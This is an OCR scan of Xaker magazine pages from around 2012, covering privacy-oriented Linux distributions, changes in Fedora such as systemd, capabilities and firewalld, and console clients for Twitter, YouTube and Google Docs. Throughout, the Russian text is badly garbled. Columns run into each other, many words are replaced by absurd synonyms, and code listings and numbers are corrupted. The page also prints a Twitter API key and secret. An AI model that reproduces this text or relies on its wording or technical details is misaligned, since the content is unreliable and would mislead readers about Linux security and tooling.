Haгdened Geпtoo , предназначенного про сборки

хитры х методов пользу кого защиты личны х данных .

PWGeп на Tailsl. Для безопасной переписки от по­

проекта. Этот инструментарий заключает та ко ие

Вотан изо них- сие бл ок ировка экрана от помо­

мощью

патчи, что SSP [защита ото переполнен равно ваш покорнейший слуга со тека

щью у тилиты slock [ too l s.suck l ess.oгg/s l ock l.

равным образом буфера! равным образом ASLR [рандомизация распределе­ ния памяти!.

Чтобы отверточник малограмотный пелена обогнать блокира-

X-chat

используется распространение

GPA

[GNU Pгivacy Assistaпt: gpa .wald . intevat i on.oгg l, а плагин SASL [ ygгek.oгg.ua/p/cap sasl.htmll обеспечивает анонимную переписку чрез Тог. В арсенале Libeгte Liпux вот и все не без этого менед­

безвыгодный со х раняется!. В L i beгte Liпu x в свою очередь убирать изрядно

Но одной блокировки после этого безусловно скудно . тор со п в рассуждении мощью комбинации

ДРУГИЕ ИНТЕРЕСНОСТИ

<Ait + Fx>,

симпатия

запрещена на настройках сервера. На минута

жер управления жете ролями Figaгo's Passwoгd

В этом разделе ваш покорнейший слуга хотел бы оповестить об во всем

лока вот и все отключаются системные Linuх­

Manageг 0 [ l s . гegпet . cz/fpm2 /l , тот или другой шифрует

интересном да полезном, что-то неграмотный вошло во пред­

комбинации

весь сохраненные пользователем парали не без; помо­

ыдущие разделы. В основном сие разные

да решить Х-сервер не ведь — не то перезагрузить машину.

щью алгоритма

трюки равным образом попросту занимательные решения,

Вторая фарс Libeгte- зто таково называемый

использованные разработчиками дистрибути­

«безопасный браузер>>, каковой использует­

заключается во наличии экранной клавиатуры

вов. Одна с интересных особенностей На v еп

ся на регистрации на точках доступа . Браузер

[Fioгence: f l oгeпce . sf.net l, которая использу­

заключается во том, в чем дело? дьявол никак не настраивает яруча

работает перед управлением выделенного

ется про обхода кейлогерров, внедренных

автоматически. Предполагается, аюшки? даже если

пользователя, имеющего минимальные компетенция

во суть тож во какие-либо библиотеки времени

пользователю вентерь отнюдь не нужна, в таком случае кризис миновал полно­

доступа, а да имеет собственные идеология

AES-256 . Интересная

особен­

ность почитай всех безопасных дистрибутивов

SysRq,

вместе с через которых мож­

исполнения . Фишка тута во том, что, на орден

стью освободить его ото всех возможных проблем.

на iptaЫes, разрешающие коннекты всего

ото хардварной клавиатуры, нажатия клавиш

После того как бы ламер убедится во рабо­

получи и распишись определенные портки веб-регистрации.

которой поймать элементарнее простого, экран­

тоспособности демона Тог, индигенат которого ука­

ная мануал управляется мышью, которую

зывает ударение на трее, возлюбленный сможет самостоятель­

бесплодно перехватывать- получишь всего

только пустить силок [то бишь NetwoгkManageгl

кого диска да памяти умереть и безвыгодный встать промежуток времени установки сиречь

вместе с через подбор Applicatioпs

завершения работы. Например, устройство,

Вторая занятная объект в -

V1daL 0a Contro l Panel

status Connected to the Tor network! Vidalia Shortcuts

•••

@яорТоr View the Network ""- вandwidth Graph

l@ Message Log

Setup Relaying

~ Use а New ldentity

~ Help

(t About

Settings

f3 Exit

-7

Staгt Netwoгk .

Haven- зто

нали-

Графический инструментуправпения

ХАКЕР

03/158/ 001 0

Hide

Tor

получи и распишись которое происходит установка, всецело

чие целиком работоспособного комплекса

зачищается толково забивки области памяти

Тог Ьгоwsег bundle [преднастроенная версия Fiгefox равно демона Тог! интересах Windows. Ты на лю-

про того, дай тебе выключить остатки предыдущей

брань пора можешь переснять его на этак

установки иначе говоря насовсем не дать ходу конфиденци­

называемый кажущийся раздел флешки [про него читай нет слов врезке! из через одного клика мышью [Application -7 Наvеп -7 Сору Windows

альные исходняк . Для защиты через атак как

Toolsl, послать флешку другу, равно спирт также станет анонимусом. Haven усилий назначить сверху другую

памяти сохраняется снова порядком секунд/

флешку вместе с через встроенного инсталлятора.

выключением.

нулями иначе случайными данными. Это нужно

Cold boot, возможных вследствие тому, сколько после выключения кусок жете сообщение во оперативной минут, видеопамять без остатка затирается под

Просто воткни подвеска во вакантный USВ-порт, выбери на подбор место

Applications -7 Haven -7

ВМЕСТО ЗАКЛЮЧЕНИЯ

Наvеп lnstalleг, равным образом дистрибутив скопируется

Собственно, получи этом дозволяется да закончить. Мы

для флешку. Естественно, без участия твоих личных

рассмотрели квалифицированная технологий, ис­

настроек да данных. Кстати, до дефолту

"1 Show this window on startup

Большинство безопасных дистрибутивов используют ряд методов зачистки жест­

Haven

пользуемых на дистрибутивах чтобы анонимусов .

подключает всегда съемные носители во режиме

Теперь тебе решать- ввести какой-либо

<<только чтение>>, сколько позволяет малозаметно

с описанных во статье дистрибутивов либо — либо при­

просматривать чужие файлы [время доступа

менить отдельные методики сверху своем компе. ::х::

007


UNIXOID

Ма ксим «hatc het» nолево й

[maks.ha tchetlaya ndex.rul .

МИНИ-ОБЗОР ЗАСЛУЖИВАЮЩИХ

ВНИМАНИЯ ИЗМЕНЕНИЙ В ПОСЛЕДНИХ ВЕРСИЯХ

FEDORA

П по части из ледние верс ии д равным образом стр равным образом бут да ва Fedo г a выделяютс я неск касательно л ь кими равным образом нтересными да ну да ж е да н н ова ци онным да

течение е н е ни ям равно . Fedoгa

Syste md,

на Fedoгa

04 переш л а для вместе с равно стему равным образом н равным образом циал да зации 15 SETUID-б ит на приложениях з амен е н

т ехнолог да е й CapaЬil i t i es , во шес тн адцато м рел равным образом зе о будучи из твлен проход в загрузчик

HAL.

GRUB2

равно убрана режим

Разработчики вдобавок приняли решен да е на будуще м

пере от мотр е ть струк т уру катало г ов, которая около малограмотный менялась

со времен

UNIX. Ра бочи й княжение

a..W.il!l$1•1

В конце концов притерпелость разработчиков

С т андартная вместе с да не без; предмет ини ц иализации

лопну л в рассуждении , да они создали систему инициализа ­

вплоть до из тавшаяся «пингвину » на

ции

SysV, наследство с UNIX,

Systemd, которая

решила постоянно проблемы

Fedora нате основе Gnome 0

-и всё, налаженность на опаснос т да . А всё потому, ась?

piпg имеет S E TUID - бит, наделяющий его права­ ми гооt , которые нужны всего только д ля того , чт касательно бы

денно и нощно обладала недостатком, порожденным

одновременно . Она стала сличать последова­

творить сырые IRAWI со кеты . И отнюдь не животрепещуще , зачем

ее а простотой . Она позволяла начинать

тельность запуска сервисов равно да х проведение

piпg всеми средствами пытается локализовать

подбор системных сервисов вот сезон загрузки

равно аж позволила отчураться с громоздких

эпоха использования повышенных прав, ве­

да добивать их умереть и безграмотный встать сезон шатдауна, хотя безвыгодный имела

скриптов, предоставив встроенные фонды

роятно не без; ть ошибки- фрукт непредсказуемая ,

никакихсредств д ля а д еква т так г оконтроля

в целях подготовки сервисов ко запуску. При этом

тем побольше почто подводный камень слабит никак не токмо piпg,

их исполнения. В результате разработчикам

первых двух целей удочка алось домчать сполна -

только равно

прихо д илось равным образом д ти нате различ н ые ухищрения ,

ма ори г иналь н ым да касательно д новременно п ростым

сложных равно жадных впредь до гооt- п рав. Как убавить

ч тобы сообразоваться задним числом д овател ь нюхалка т ь после п уска

не без; п особом, а име нн что до п у т ем заб л аго на реме нн по части г что до

риски во этой ситуа ц ии? Ис п касательно л ьзоват ь S EL iпux?

сих самых сервисов , насчёт пт имизировать заг р узку

соз д а н ия файл-сокета се р виса.

Слишком толсто, особенно не без; уче т ом т в рассуждении г о, ч т в отношении

ОС равным образом контролирова т ь ис п в рассуждении лн е н ие демонов,

Systemd

кайфовый ш ла на F edoгa

04

во качес т ве

ftp

да кипа других софтин, с огромной форой больше

многие пользователи никак не понимают да имеют

которые имеют атрибут п ерио д ически п адать

опции, однако ранее ко сле д ующему релизу превра т и­

привычку отключать его. П озволить софтина м,

из- з а отнюдь не х ватки ресурсов, ОоS-атак равно ошибок

лась на ста нд ар т ную систему запуска/контроля

отнюдь не имеющим прав гооt, организовывать RАW-сокеты

во коде . Появилась разрозне н ная ахан сложных

сервисов. Е е по-под д ержка была до оный поры более рас­

равным образом привилегированные порты? Е ще большая

ширена на Fedoгa 06lбыли переписаны мно г ие устаревшие скрипты инициализации!.

вагина во безопасности . Ах так точно , у нас а очищать шту­

скриптое инициализации, походя вызываю­

суп х множе не без; тво подсобных утилит что-то

gгер ,

awk

cut,

да им подобных. Она архи несложно ру­

шилась присутствие малейшей модификации. В общем,

ковина перед названием Что такое

CAPABILIТIES

VS SETUID

Capabilities! Capabil ities? Это режим

деле­

гирования повышенных прав «по кусочкам » ,

демократичность породила экстремальность , которая из года­

Ис п олняемые файлы от SЕ Т UIО-битом- тройчатка

своего рода род

ми всё лишше росла да мешала .

всех н иксов. Н ай д ут на каком-нибудь piпg д ыру

ко, тяжба невыгодный полными, а часочек т да ч ными власть ми

008

SETUID,

возьми д еляющий , одна­

ХАКЕР

03/158/20 02


Федорина благодать

гооt, например, позволяющий строить RАW­

fedora

0

сокеты тож характеризовать привязку для приви­

легированным портам. Благодаря CapaЬilities,

ping'y дозволяется передать полномочия только лишь получай создание в нем дыру, дьявол неграмотный получит ничего, сверх того

.. . да,

полномочия для образование RАW-сокетов. Какая досада, не что правда ли?· Первоначально аппарат CapaЬilities поя­ вился так ли в включен на

HP-UX, так ли во AIX. Он поуже давно стандарт POSIX, одначе насчёт нем пустое место

:::::.=--:::5:::

""'" ............

~-·

RАW-сокетов, да инда если бы грабитель найдет

·-=::

.. ... ,.-.

!М()

дост,..._rt••••••• мllwn-

w•

~· ·--·· ,~~

___...,_

ит,.ас •

....~

· -~· ··­ .................. _ .....

в отношении ,

~~о~Мо~~. ,

·:::::;:; О0_ 3-• •м·-~-·-•н _ ,..,... [) ( мм••...,.._,.,,...-

____,_. _ --------·

:-

....

файловой системы во ядре

Linux 0.6.24.

КАТАЛОГОВАЯ СТРУКТУРА

-

. ..._ ,

далеко не вспоминал, в эту пору отнюдь не появилась выполнимость

распоряжаться привилегиями из через атрибутов

0

Fedora сверху

• ам"

Графический прибор уnравления Systemd

Установка

разделов или, почто единаче круче, Ыгf-снапшотов.

для твердотельным накопителям !запись во ФС всегда производится на режиме

К сожалению, многие старые пердуны ,

Еще одна интересная идея, предложенная

btгfs

COW- копиро­

пользу кого реализации на следующих версиях Fedoгa,

привыкшие ко миру равным образом сnокойствию да радею­

вание nри записи!, а да имеет встроенную

заключается на реорганизации каталоговой

щие вслед за подтверждение традиций, выеказались

поддержку онлайн-снапшотов, зачем позволяет

структуры, только что такое? не далеко не менявшейся со времен

навстречу этой идеи, подкрепив домашние болтология тем,

во всякий миг построить фотография текущего

UNIX. Эта

что, дескать, снедать образец

состояния ФС равным образом откатить ее для предыдущему со­

соображение состоит на том, дабы пере­

LSB

равным образом что такое? придет­

местить по сию пору исполняемые файлы во /usг/Ьin, отказавшись, таким образом, с каталогов /Ьin, /sЬin, /usг/sЬin, а в свою очередь с каталога /lib, всё со­

ся ударять по мнению рукам от разработчиками софта

стоянию. В Fedoгa

равным образом другими дистрибутивостроителями, потому

докер

планы на будущее реализации описанной идеи непостоянно

ным подходом ко формированию карта загрузки

держимое которого планируется nеренести во

до этих пор туманны.

IGRUB самовольно находитустановленные ОС/ядра

GRUB2,

06

произошел претворение держи за­

отличающийся интеллектуаль­

равным образом добавляет их во список!, подтверждающий

/usг/lib . Нововведение сие далеко не всего лишь равно невыгодный столь­ ко косметическое, как много в глубине практиче­

ДРУГИЕ ИНТЕРЕСНЫЕ ИЗМЕНЕНИЯ

UNICODE

ское. Дело во том, что, по мнению мнению разработчиков

В 05-ю версию Fedoгa был добавлен овинник

ческим интерфейсом. Из системы вот и все была

дистрибутива, /Ьin, /sЬin равным образом /lib сделано издревле по­

fiгewalld, позволяющий превращать взгляды па­

целиком и полностью удалена жилка

теряли частный идея как бы каталоги для того хранения

кетного фильтра получи лету, безо перезагрузки всех

Abstгaction Layeгl, возмещение которой ныне ис­

базовой системы, которая может бытийствовать загруже­

правил да разрыва сетевых соединений. Так

пользуется

на, инда если бы каталога /usг вышел получи месте lв ста­

в качестве кого чтобы управления демоном служит учет

предназначенными ради управления дисковыми

рые Эпоха Екатерины его было традиция включать

от через NFSI. В в таком случае а сезон перемещение всех системных файлов во /usг позволит разбудить

0-BUS,

им может применить что угодно при­

да обладающий полноценным графи­

udev объединенно

от

HAL IHaгdwaгe

udisks

равным образом upoweг,

накопителями lв томик числе равно с целью выполнения

ложение от соответствующими полномочиями.

автомонтированияl равно контроля питания. За число отсчетов

Для уnравления демоном с командной строки

удаления

предусмотрена обслуживающая программа fiгewall-cmd, со по­

ки системы равно ее реагирования нате отсоединение

трюки, как, например, погрузка разных версий

мощью которой позволительно делать от правилам и,

внешних устройств.

системы со через монтирования разных /usг-

отталкиваясь через имен служб, а далеко не IР-адресов

больше гибкую систему, так чтобы совершать такие

HAL посчастливилось

сжать срок загруз­

Fedoгa 06теперьсодержитвкомплектеути­ литу viгt-sandbox, nредназначенную чтобы заnу­

равным образом номеров портов:

ска приложений на изолированном окружении .

#define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define

0 CAP_DAC_OVERRIDE 1 CAP_DAC_READ_SEARCH 0 САР _FШ.JNER 3 CAP_FSETID 4 CAP_KILL 5 САР _SETGID Б САР _SETUID 7 CAP_SETPCAP 8 CAP_LINUX_IMMUTABLE 0 CAP_NET_BIND_SERVICE 00 CAP_NET_BROADCAST 11 CAP_NET_ADMIN 12 CAP_NET_RA~ 13 CAP_IPC_LOCK 14 CAP_IPC_O~NER 15 CAP_SYS_MODULE 15 САР _SYS_RAIOO 17 CAP_SYS_CHROOT 18 CAP_SYS_PTRACE 19 CAP_SYS_PACCT 20 CAP_SYS_ADMIN 21 CAP_SYS_BOOT 22 CAP_SYS_NICE 23 САР _CHШ.JN

Сnисок

Capabllities ядра Linux

ХАКЕР

03/158/2012

$ firewall-cmd $ firewall-cmd

В крест с

--service=ssh --еnаЫе \ --service=samba --timeout=18 $ firewall-cmd --disaЫe \ --service=ipp-client --еnаЫе

selinux-sandbox,

новая обслуживающая программа

может истощить для того формирования <<nе ­ сочницы» любую технологию, поддерживаемую

библиотекой libviгt, скажем контейнеры

LXC

либо — либо виртуальную машину QEMU/ViгtuaiBox. Дистрибутив сегодня поддерживаеттех­

В комплекте из пирушка но Fedoгa пределенная файловая

05 ну сколько ж рас­ система CloudFS, пред­

ставляющая из себя расширенную редакцию

нологию безопасной загрузки Tгusted

Boot,

гарантирующую неуклонность ядра да си­

стемных компонентов в пора загрузки ОС

виртуальной ФС GlusteгFS, которая nредназна­

и, таким образом, предохраняющую систему

чена на развертывания распределенных фай­

с различных руткитов равным образом другого вредоносного

ловых систем.

CloudFS

работает на пространстве

пользователя, посему может бытовать свободно

ПО, внедряемого сам во косточка ОС. Для реализации технологии во систему был до­

установлена на других Linuх-дистрибутивах на

бавлен частный модуль, вызываемый вновь

создания гетерогенного кластера.

накануне загрузки ядра, впрочем симпатия бесполезен безо

В Fedoгa

05 равным образом

изменилась чертеж име­

нования сетевых интерфейсов, которая ныне

соответствующей аппаратной поддержки . Также реализована построение проброса

выглядит следующим образом: встроенным

USВ-устройств получи и распишись удаленные машины, которая

на материнскую плату llelmbedded lmlotheгboaгdl

позволяет обесnечить, например, проход для wеЬ­

сетевым адаптерам присваиваются имена

камере от новый машины. Система работает

em1, em2

равно т. д., о ту пору в духе платы, подключаемые

со помощью где

emO,

PCI,

0- закидон

получают имена вида

РС I -слота, а

pci1#2,

0- сеточный

порт.

получи основе интегрированного на Fedoгa токола удаленного доступа ной аппаратура

QEMU.

Spice

04 про­

равным образом виртуаль­

П роброс nроисходит во двушник

Начиная со 05-й версии, Fedoгa дозволяется устано­

этапа : раньше получи и распишись виртуальную машину, а поэтому

крутить получи файловую систему Ыгfs средствами

в удаленную, идеже осуществляется исподняя

штатного инсталлятора. Btгfs отличается высо­

nроцедура проброса устройств держи реальную

который производительностью равно дружелюбностью

машину. :::к:

009


UNIXOID

Евгеньюшка Зобнин

вплоть до небес

lzobniniOgmail.coml

АТЬ ИНТЕГРИРУЕМ LINUX И <<ОБЛАЧНЫЕ>> СЕРВИСЫ

Все я медленно, только не исключено переходим для работе умереть и неграмотный встать Всемирной паутине, забывая

привычные настольные приложения. Современный вселенная немыслим без участия

YouTube, GDocs

Gmail,

равным образом огромного количества веб-сервисов, заменяющих нам обычные

программы . Но круглым счетом ли нужен веб-браузер, ради делать узус из чего «облачными» приложениями?

до самого <<облако во >> с командной строки равно nре­ дол ж в

вратим файловую систему во приспособление к

ыть операционная сис т ема,

сполна следовать вязанная держи << обла ч ные » рядом ­

работы со <<об лаками >>.

ложения ? Такой, на правах ОС-браузер, как-то

Google

Chгome

пре со л что до вутый

05? Или, может быть, такой, Plan9, безграмотный делающий различий

вроде

К Л И Е Н ТЫ << ОБЛАЧ НЫ Х» СЕРВ И СОВ С веб-сервисами далеко не издревле рационально делать

посредь л ока льными равно сетевыми ресурсами?

изо окна веб-бра узера. Тот но Twitteг, напри­

Нет, поскорее всего, возлюбленная хорэ nредставпять

мер, для широком экране занимает самое многое

лицом бог знает что от реднее посреди ними, так глотать опе­

nолстраницы, а багрить окошечко Твиттера

рационку, позволяющую <<хо дить во

с браузера, nодгонять размер сего окна

.. облака">>

равным образом тем равным образом др угим из в соответствии с собом.

Подви жки на создании подобной ОС нача­

равным образом топтать после тем, дабы ненароком его неграмотный за­ крыть, продолжительно равным образом н еудобно. К тому а плита

лись еще издревле . Те а стандартные окружения

навигации полноте меш ть . Гора здо даст сто очков вперед

рабочего вместе с тола с целью Liпux сделано для у чили вместе с ь син­

nосадить Т виттер на трей, дай тебе об н nоказы­

х ронизировать исходняк пользователя от <<об лач­

торсион новые сведения во виде всплывающих

НЫМ >> х ранилищем

IUbuntu One], проигрывать видеозаписи с YouTube на окне стандартного медиапроигрывателя ITotem, наnример, умеет

подсказок. Как сие сделать? Да несложно

зто поуже серия лет] , получать информацию

для того Liпu x питаться разработанный энтузиастами

из веб-страниц нате наемный рабочий харчи lвиджеты КОЕ и Google Gadgets] равно пускать в ход бездна

клиент. Среди Тwittег-к лиент ов наибольшей

др у ги х способов интеграции со веб-сервисами.

рый, п омимо Твиттера , поддерживает уже

В э праздник ста тье моя персона расскажу, для ак до сей времени побольше

да

поднять объем соnрикосновения веба

Fг ie ndFeed равно

да обычного Linu х-десктопа . Мы рас смо трим

сказать, возьми любит еля, беспричинно по образу оно ахти тя­

куча приложений в целях холоп ото ы со <<об­

желовесное равно зависит через различных Gпоmе­

лачными >> сервисам равно , попробуем дост учат ься

библиотек. Поэтому ценителям аскетизма

010

прибегнуть одним изо Тwittег-клиентов .

Почти с целью каждого п об п улярного ве б-сер виса

nоnулярно со тью nользуется Gwibbeг, кото­

ldenti.ca, StatusNet, Fa cebook, Fl ickг, Digg, Qaiku. Прило жение это, потребно

Tyrs- строгий Тwittег-клиент для того

рента

ХАКЕР

03 / 058/201 0


Дос тучаться предварительно небе из

.

• • • • • • • • • • • t3 НО.аt~ IКIIIДKI ~ ;:, ·' "' 0.-' В. ~ ~ · & ~+Т 'a.:J

• Устройс:тва.Аrd'оld • ctrome Sjnc • Почтовые кпиенты,

art+N Н0.0. 01\ОЮ 0 !МЖ - -оnмто

\

~

Microsolt OU1Iook

• КtМентыча.та,~GО<9!ТаkИ1111АIМ

Shit+Ctf1+N )

~дкм

Чтобы восnоJЪзова.ТhСЯ ЗТWr.1И f1МГ1С!Ж~. сначаланеобхоДимо сrенермровать nаролм nрмо•ен11i . после их

B~IIT~~o Копмроеа~ естнмn. 0

~ авест м е соответ~ ГIOJ1A rtJWI()Жei-МA чем своеrо oбыLiiOI'O napotiR. дпя каждоrо 0'1Мf'10ЖеtМЯ нужно генерировать близкий naporь . ~

PI~ T et!C TI

О nосмотриrе RИдео по части narюnяx mиnoжetмii! !;iсохр- т~о ст~ttМцукак ...

0

Ctrf+S

l::tайтм .. .

QЬ [}e'I8T8 .. .

Рее~

ctrt+P

введите название, с целью безграмотный :sа.бьnъ. ко какому 01рИfЮ1КеtИ0 относится naporь:

имя: !gcx9e-docs

J::tc:Topltll

Д14Смтчер аад~

st.ift+EIC.-

~ <NмсТМП. д- npoc !OOTpo8 ... Соо6щмn. по части

ш аг lмs 0. Со3Д8.Ате новыill парель nрмложенмя

C! ri+F

Shift+Ctrf+Deletl

(JI06ne-...

ЗWруакм

"- n....пpw > * о'~

tsодмровка \lk>coд...W адрес из тр~-.1

ctri+ U

Гlросмотреn. фоноll~ CTPIIИ..IW (lS)

QJ tnJ!aeк• Shift+Ctt1+J :;; .с=.'"' ..,. -.----

ИНс: Тр)'М~ ТW p 01p86oT- I

Shift + Ctfi +l

Кoиi;~}W&S<npl

0 соsдатъ rщюгь

~~~Android" "Gm8illнauoeи•Pflone•

'GOO{Ielllll(

"o..ctook-~ю.n.ю1ep·, ·т~

CМIЩ)OНI'IIмtMII С М118')'МТ ОМ toЬnine9m8il .com nаролм ~ипо~

годовщина соtдаtмЯ

Дата nосnедн«о мсnолЬ2оваtМА

ctrome

OL12.20U OL12.20U

01.12.2011 02.12.2011

~~

еа·mаМ

a/O"oid

09.01.2012

09.01.2012

~1

~]

Создаем жете амплуа для того нawero Gооglе-приложения

Во т та для , л е rким дв иже н да е м рук равным образом , хорошо й от айт м об ж а превра ти ть на десктоп н ое п р равно одр ни е

автор этих строк бы порекомендовал оценить во сторону

интересных клиентов, как бы графических, круглым счетом

ровалея получи них по поводу п опу л ярности , а малограмотный лич­

Рiпо или — или

да консольных. П ользователи среды Gпome

н ы х прист р мастак т ий), т относительно з д йес ь мож н в отношении выд е точить

на любом дистрибутиве, беспричинно ч т относительно найти их

получают нераздельно с таких клиентов во комплекте

серия инте р йес ны х близ л оже н ий. В о­

равным образом рисковать на деле безвыгодный составит труда. Осо­

вместе с плеером

бого внимания как и заслуживает

но целей могут истощить плеер

Hotot.

И оный да прочий доступны

TweetDeck

Totem.

Пользователи КОЕ4 интересах тех

minitube,

первых, сие множест во в отношении самых разнообразных «уведомляло к» в целях

Gmail, лучшими с ко­ CheckGmail равно Gmail Notifieг.

-стильный Тwittег-клиент, какой особняком

позволяющий просматривать, отыскивать видео

торых являются

ценят пользователи маков. Одна беда- симпатия

да со от тавлять плей-листы. Программа малограмотный за­

Обе выполняют одну простую вслед д ачу - сидят

требует

висит ото библиотек КОЕ, того подойдет

во трее равным образом выво дя т передача п р равно п олуче н ии

Adobe AIR,

сколько неприемлемо чтобы

многих юниксоидов. Поклонники I М-клиента

в свой черед приверженцам побольше экзотических

переписка . П по части клику происхо д ит п ерехо д н а сайт

P i dgiп должны хоть лопни преобразить внима­

графических сред. Особого внимания за­

Gmail . Аналогичная

ние для Тwittег-плагин интересах своего фаворита

сл у живает консольный скрипт y outube-vieweг,

называется kdeplasma-gmailпotifieг. Она,

[ возлюбленный что-то около да называется- pidgiп-twitteг) . Это

позволяющий выслеживать да просматривать видео

во медаль через двух упомянутых вас ш е насчет г рам ­

пусть даже побольше укромный равно желанный вариант, не­

от через штатного МРiауег.

мок, может висе т ь невыгодный лишь во трее [а точнее,

жели полноценное использование : всё во одном

Просто запусти youtube-vieweг, введи

херовина интересах К ОЕ 0

в панели), да да сверху рабочем сто л е равно вообще где угодно, куд а К ОЕ п холм на насчёт л яет засу н у т ь

месте равным образом никаких лишних окон. П оклонники

искательский запрос, да нате экране появит-

рента вдобавок малограмотный останутся помимо вкусного.

ся пронумерованный инвентарь с двадцати

плазмоид. Также принимать полноценные клие н твоя милость

В репазитариях дистрибутивов предостаточ­

первы х совпадений . После ввода гостиница

чтобы работы от в почтение какого праздника во ой службой. Из самый

а Тwittег-клиентов из интерфейсом команд­

н у жн что касается го ролика возлюбленный тотчас же начнет

интересных ваш покорный слуга бы отметил консольный

утнапиштим строки не так — не то пcuгses. Вотан изо самых

пр что до игрываться на полноэкранном режиме.

около без остатка копирующий интерфейс

простых да удобных написал во всем славный

С крипт позволяется пускать в ход чтобы получения

легендарного п очтового клие нт а

Linuх-разработчик Gгeg Kгoah-Haгtman . Этот

списка самых популярных роликов вслед с утра до ночи

sup,

Mutt.

Среди утили т команд н ой строки мож н относительно вы­

покупатель называется Ыi да может взяться исполь­

[флаг'-!'), списка самых популярных роликов

зован , например, так:

из-за на со ё времена ['-а ' ), поиска плей-листов ['-р')

водит слово/фразу/предложение нате заданный

равно фильмов ['-М ' ) . Для указания предпо­

язык, равным образом cliweatheг, печатающий текущую

чтительного качества видео предусмотре-

погоду ради указанного места земного шара.

ны флаги

'-2', · - з · . '-4', '-7', ·-1· [240р, 060р, 480р, 020р равно 0О ВОр соответственно). Также

Оба куда просты на использовании равно да д еа л ьно

маленькое чудо. придется поизвращаться

со через флага '-sub;гu' позволяется пере­

твоя милость или, например, соз д анияу на е д ом л е н ий

не без; ОАuth-аутентификацией, которую исполь­

ключить МРiауег получи пользование русских

от через

зует Твиттер. Для азбука на разделе разра­

со у бтитров. Чтобы скрипт выводил более

ботчика приложений Т виттера

результатов поиска

$ echo

"Му

current uptime is 'uptime'"

0

bti

Однако, дай тебе похерачить проэксплуатировать сие

[tw itter.com/

apps/пew ) надобно нахватать Coпsumeг Кеу и Consumeг Secгet да внести их на конфиг Ыi:

хоругвь

'-m '. Скрипт

разобщать скрипт t г aпslatoг, какой п росто пере­

подходят на интеграции на небо и земля скри п ­

notify-send:

[50 награду 00) , используй

$ notify-send

youtube- v iewe г может заделаться

'cliweather

П огода

\

И НД ЕКС -Г О РОДА'

настоящим открытием в целях любителей смо­ треть коньки вместе с

YouTube.

Найти да пустить

Команду мож н в рассуждении п р описат ь во скри n те

$ vi -/.bti

видео со его через не возбраняется после считанные

равно навешать получай г орячую клави ш у другими словами на клю­

# Consumer key

сек у нды , а МРiауег обеспечивает незначительно

чить на после д ание

consumer_key;cZy8DdioswAfuЗLJYgбE2w

побольше высокое характер картинки. Скрипт

пускать в дело единолично с множес т ва апплетов чтобы

# Consumer secret

особенн касательно вредительство у ален рядом просмотре НО-видео,

отображения пого д ы на трее).

consumer_secret;fniGGUeT12mMWKjmThUdSeKN 32NLWfmnwapwubVQ

из которым f l аsh-проигрыватель справляется

cron [хотя, конечно, фаллос обнее

Нельзя оставит ь помимо внимания равным образом подбор ути-

плохо, а МРiауег гоняет его вне какой-либо значительной нагрузки бери процессор. Стоит

Далее нелишне шибануть Ыi. Он напеча­

отметить, что-нибудь хозяйка живость загрузки видео

тает нате экране местоположение страницы, получи и распишись которой

тоже повышается [это испытано экспери ­

твоя милость вместе с можешь обрести

ментальным п у тем , только не без; нежели связано , неяс­

PIN.

Его делать нечего

определить во отрицание Ьti, позже почему получай диcплeй будут

но). В качестве альтернативы youtube- v ieweг

выведены access_tokeп_key равным образом access_tokeп_

дозволено пустить в ход

secгet, которые согласно правилам таково но придется до­

митивный nсuгsеs-интерфейс вместе с vi- п что касается д обным

бавить во конфиг. Далее Ыi потребно заработать,

управлением . Однако спирт имеет значительный

videotop,

имеющий при­

да от его через дозволяется хорэ посылать

недостаток: требует полной загрузки видео

сведения стойком с командной строки.

предварительно азы просмотра . Что касается других

Для

серви из ов поискового гиганта [я сконцентри-

YouTube

ХАКЕР

опять же существует порядком

03/158/20 02

УСТАНОВКА GOOGLE FS В UBUNTU

DOCS

$ sudo add-apt-repository ppa :doct ormo/ppa $ sudo apt -get update $ sudo apt- get instal l googl e-docs- f s

011


UNIXOID лит лещадь названием GDataCopieг, предназначен­

Google Docs. Пакет включает в себя пятеро простых утилит : gls в целях просмотра списка документов, gcp на копирования впредь до ­

веб-приложений во отдельных независимых ·

$ google calendar add \

ный на работы со

'День,

когда-никогда свет остановилась'

браузера .

0.

Добавление контакта:

Когда-то

$ google contacts add \

gmv

запустила самолюбивый

rn.

0.Ql•l <! abs ~~ rol, позво­

ляющий обратить веб-сайт на стандартное

'Евгений

с целью удаления да перемещения документов со­

ответственно. Пользоваться во всех отношениях сим добром просто да подкупающе . Например, интересах просмотра

Mozilla

план Pгism 01:1.

кументов не без; локальной механизмы равным образом держи нее, gmkdiг для создания каталогов равным образом утилиты gгm равно

окнах, лишенных элементов управления веб ­

десктопное прибавление со своим ярлыком,

процессом управления равным образом прочим равно атрибутами

0.

Редактированиедокумента

Google Docs

совершенно х документов изо папки «Работа» делаем

[вдефолтном редакторе, отчество которого

в такой мере :

замечено на переменной окружения EDITORI:

обычной программы . Тогда многие адепты компании заявили , который вскакивание подобного проекта- сие ступень для светлому будущему <<о б­ лачного >> десктопа, во котором превалирующая

$ gls

$ google docs edit --title \

Для их экспорта на формате

PDF

столе равным образом з ап уск ать вне использования веб­

получи и распишись локаль ­

0.

н у ю машину- так:

Добавлени е н ово г что до альбома на

Picasa [и за­

ливка фотка к!:

создания кас т ом ны х браузеров да со вязанны х

userпame@gmail .com: / docs / Paбoтa /*

$ google picasa create --title \ "Мои фотки" -/photos/*.jpg

/ tmp/

Для созда ния каталога- так: П убликация видео получай

YouTube:

\. ....

идеи живут равным образом дажевнекотором смысле про­

Например, скандально известный

Google

Chгome

уж давненько имеет на своем составе конструкция

userna.me@gm;;~Ц_ . !;от;/. dас/t:tовая_папка

GoogleCL,

статочно обнаружить спешный веб-сайт, перепрыгнуть

Во миг первого обращения для сервису возлюбленный

ярлыки приложений ... >>, найти простор раз­

во точка << Меню

предназначенном чтобы

работы со такими сервисами Гугла, вроде Bloggeг,

попросит насадить Gооglе-логин [адрес почты

<<Календарь>>, <<Контакты>>

держи

[Gmaill, Google Docs,

превращения веб-сайтов во приложения . До­

$ google youtube post --category \ Comedy yжoc.avi

Конечно же, не дозволяется подзабывать равно по отношению контроль­

ном скрипте

вместе с wеЬ- т ехноло г иями приложенийl, же его цвета полуют .

0. gтls<iir

браузера. Проект безбедно загнулся

[а есть л равным образом т оч н ее, переро не без; вот фре йм на об р ко про

$ gcp -f pdf \

$

приложений склифосовский делать на Сети , а поль­ зователь сможет помещать их для рабочем

"Список покуnок"

Gmaill да откроет страничк у на спринклер ре,

Picasa да YouTube [только добавка видео!.

бери которой должен п что касается дтвердить компетенция

